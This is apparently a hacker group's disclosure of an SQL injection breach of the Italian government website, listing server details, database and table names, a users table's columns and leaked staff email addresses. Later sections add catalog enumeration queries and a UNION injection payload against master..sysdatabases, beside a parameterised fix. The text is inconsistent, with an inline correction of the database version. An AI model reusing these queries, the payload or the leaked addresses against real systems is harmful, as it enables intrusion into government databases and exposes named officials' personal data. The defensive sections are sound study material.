SQL Injection Vulnerability in Italian Government's Website!



Site penetrated by: God_Of_Pain, Lord TittiS, SYSTEM_OVERIDE
[1] Site And Server Info

# Website link : https://governo.it/

# Bug Url: Can't Publish

# Powered By: ASP.NET

# Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
# Server Name: WEB-VSQL1\INST1

# Current DB: chigi_intranet

# Database: MSSQL 2005 (inconsistent with the Server Detail line above: build 8.00.2039 is SQL Server 2000 SP4, so the version string, not this line, should be trusted)


[2] SQL Detail

# Databases List:
- chigi_intranet
- master
- tempdb
- model (LOCKED)
- msdb
- AAA (LOCKED)
- chigi_mag2006
- chigi_developer
- sondaggidb (LOCKED)
- AffariRegionali_BO (LOCKED)

# Tables of 3 DBs:

[+] chigi_intranet:
doc_tipi
qst_datipersonali
doc_target
doc_prov_tipi
eml_scrivi_a
doc_prov_aree
doc_monitoraggio_soggetto
eml_categoria
doc_monitoraggio_sede
doc_monitoraggio_organo
doc_monitoraggio_azione
doc_lingue
eml_autori_aree
doc_iter
doc_fonti
doc_dossier
doc_documenti_swap
doc_atti_tipi
doc_associatipi
Composizionenewsletter
eml_aree
Argomento
eml_registra_operazione
ana_amministratori_pubblici
qst_pianodiazione
web_webletter_log
pag_sezioni_pagine
pag_documenti_sezioni
faq_keyword
faq_faq_gruppi_keyword
doc_documenti_target
doc_documenti_monitoraggio
doc_documenti_links
doc_documenti_fonti
doc_documenti_dossier
doc_documenti_allegati
web_webletter_testo
pag_sezioni
int_interrogazioni
faq_form_richieste
faq_faq
faq_diritti_utenti
doc_monitoraggio_soggetto_prov_tipi
pag_autori_pagine
doc_monitoraggio_azione_prov_tipi
doc_fonti_tipi
doc_documenti
ana_amministratori_pubblici_mail
nwl_Newsletter
web_webletter
temp_monitoraggio
Results
pag_pagine
nwl_Notizianewsletter
nwl_Notizia_link
nwl_Notizia_argomento
nwl_Composizionenewsletter
nwl_Argomento
not_notizia_pub
not_notizia_link
not_notizia_argomento
not_notizia
not_immagini
log_ricerca
log_Domande
int_tipi_interrogazione
int_sedi
int_gruppi_parlamentari
ana_autori
gen_governi
faq_gruppi_keyword
faq_aree_tematiche
dtproperties
faq_aree
qst_semplificazione_proposte

[+] Master:
spt_server_info
spt_datatype_info
MSreplication_options
spt_datatype_info_ext
spt_provider_types
spt_fallback_usg
spt_fallback_dev
spt_fallback_db
spt_values
spt_monitor


[+] Msdb:
sysjobschedules
RTblIfaceMem
backupfile
syscategories
systargetservers
RTblWorkspaceItems
restorehistory
systargetservergroups
RTblDatabaseVersion
systargetservergroupmembers
sysalerts
RTblDTSProps
RTblVersionAdminInfo
restorefile
sysoperators
sysnotifications
RTblParameterDef
restorefilegroup
systaskids
syscachedcredentials
RTblIfaceHier
logmarkhistory
RTblNamedObj
sysdtscategories
sysdtspackages
RTblTypeInfo
sysdtspackagelog
RTblScriptDefs
RTblOLPProps
sysdtssteplog
RTblEnumerationDef
sysdtstasklog
RTblClassExtension
RTblSumInfo
RTblMDSProps
RTblEnumerationValueDef
RTblUMLProps
sysdbmaintplans
sysdbmaintplan_jobs
RTblUMXProps
sysdbmaintplan_databases
RTblSIMProps
sysdbmaintplan_history
RTblGENProps
RTblDTMProps
log_shipping_primaries
log_shipping_secondaries
RTblDBMProps
RTblEQMProps
log_shipping_monitor
mswebtasks
log_shipping_databases
log_shipping_plans
RTblVersions
log_shipping_plan_databases
log_shipping_plan_history
RTblDBXProps
RTblRelships
RTblSites
RTblProps
RTblRelshipProps
RTblPropDefs
RTblRelColDefs
RTblIfaceDefs
backupmediaset
sqlagent_info
RTblClassDefs
sysdownloadlist
backupmediafamily
sysjobhistory
sysjobs
RTblTFMProps
RTblRelshipDefs
backupset
sysjobservers
RTblTypeLibs
sysjobsteps



[3] User Information Found

The table "ana_autori" appears to be the users table.
Its columns:

aaut_alias
aaut_approva
aaut_cancella
aaut_cognome
aaut_consultazione
aaut_dipartimento
aaut_dossier
aaut_email
aaut_fonti
aaut_gestpagine
aaut_gestutenti
aaut_governi
aaut_id
aaut_logs
aaut_newsletter
aaut_nome
aaut_note
aaut_password
aaut_questiontime
aaut_rassegna
aaut_rep_amministratori
aaut_scrivia
aaut_sigla
aaut_tipi

Get data from "aaut_email" and "aaut_password"

Result is:
a.decaroli@palazzochigi.it
cips @ciaps.com
f.salzano@governoit
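The database, table and column lists in sections [2] and [3] are what SQL Server 2000's catalog tables return when read through an injection point. The following T-SQL is an added example written for this page, not the queries the attackers ran (the vulnerable URL was never published); it is meant to be run by an administrator as the web application's own login to see exactly what an injected query could reach. Database and table names are taken from the dump above; everything else is standard SQL Server 2000 syntax.

```sql
-- Added example: SQL Server 2000 (8.x) catalog queries that reproduce the
-- lists in sections [2] and [3]. Run as the login the web application uses.

-- Fingerprint. @@VERSION is where the quoted string
-- "Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)" comes from.
SELECT @@VERSION AS version_string,
       @@SERVERNAME AS server_name,      -- WEB-VSQL1\INST1 in the dump
       DB_NAME()   AS current_db;        -- chigi_intranet in the dump

-- [2] Databases list. SQL Server 2000 has no sys.databases view; the
-- catalog is master..sysdatabases. HAS_DBACCESS() = 0 is the usual reason
-- a database shows as "(LOCKED)" in a dump: the application login cannot
-- open it, so the injection cannot enumerate its tables.
SELECT d.name,
       CASE WHEN HAS_DBACCESS(d.name) = 1 THEN '' ELSE '(LOCKED)' END AS access_state
FROM master..sysdatabases AS d
ORDER BY d.dbid;

-- [2] User tables of one database. xtype 'U' = user table; views ('V') and
-- system tables ('S') are excluded. Three-part names work across databases
-- the login can open.
SELECT name
FROM chigi_intranet..sysobjects
WHERE xtype = 'U'
ORDER BY name;

-- [3] Columns of the suspected users table, with their types.
SELECT c.name   AS column_name,
       t.name   AS type_name,
       c.length AS byte_length
FROM chigi_intranet..syscolumns AS c
JOIN chigi_intranet..sysobjects AS o ON o.id = c.id
JOIN chigi_intranet..systypes   AS t ON t.xusertype = c.xusertype
WHERE o.name = 'ana_autori'
ORDER BY c.colid;

-- Audit check: is the application login overprivileged? If this returns 1,
-- an injection is not limited to chigi_intranet but owns the whole instance.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       SYSTEM_USER                  AS login_name;
```

The access_state column is the practical takeaway for defenders: every database that is not "(LOCKED)" for the web login is exposed by a single injection point, so the application login should have access to chigi_intranet only, and the column list of ana_autori shows why (aaut_password sits beside the administrative flags aaut_gestutenti and aaut_gestpagine).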

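Section [1] identifies the stack as ASP.NET in front of SQL Server 2000. The dump does not show the vulnerable code, so the following is an added example, not code from governo.it: a hypothetical document-lookup procedure for the chigi_intranet schema written the two ways dynamic SQL is commonly written on SQL Server 2000. The table doc_documenti is from the dump; the procedure names and the columns doc_id and doc_title are assumptions. The same concatenation bug looks identical in the ASP.NET page itself (a string built into a SqlCommand), and the equivalent fix there is SqlParameter binding.

```sql
-- Added example (hypothetical procedures; doc_id / doc_title are assumed
-- column names). Shows how the section [2] database list is pulled through
-- a concatenated query, and the parameterised form that stops it.

-- VULNERABLE: @id is spliced into the statement text. Whatever arrives in
-- the query string becomes part of the SQL.
CREATE PROCEDURE dbo.doc_get_vulnerable @id varchar(200) AS
BEGIN
    DECLARE @sql nvarchar(4000)
    SET @sql = N'SELECT doc_id, doc_title FROM doc_documenti WHERE doc_id = ' + @id
    EXEC (@sql)
END
GO

-- HARDENED: sp_executesql binds @id as an integer. The catalog query below
-- is rejected at the type boundary instead of being executed.
CREATE PROCEDURE dbo.doc_get_safe @id int AS
BEGIN
    EXEC sp_executesql
        N'SELECT doc_id, doc_title FROM doc_documenti WHERE doc_id = @p_id',
        N'@p_id int',
        @p_id = @id
END
GO

-- Demonstration. The first call returns one document. The second appends a
-- UNION that reads master..sysdatabases, which is how a list like the one in
-- section [2] ends up in the HTML of a normal page. The third call cannot be
-- made with the same payload at all: the parameter is an int.
EXEC dbo.doc_get_vulnerable @id = '1'
EXEC dbo.doc_get_vulnerable @id = '1 UNION ALL SELECT dbid, name FROM master..sysdatabases--'
EXEC dbo.doc_get_safe @id = 1
GO
```

Note that the UNION payload works only because its two columns line up with doc_id and doc_title; that column-count matching, plus the "(LOCKED)" databases the login cannot open, is exactly the shape of the output in section [2].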


News Source : Lord TittiS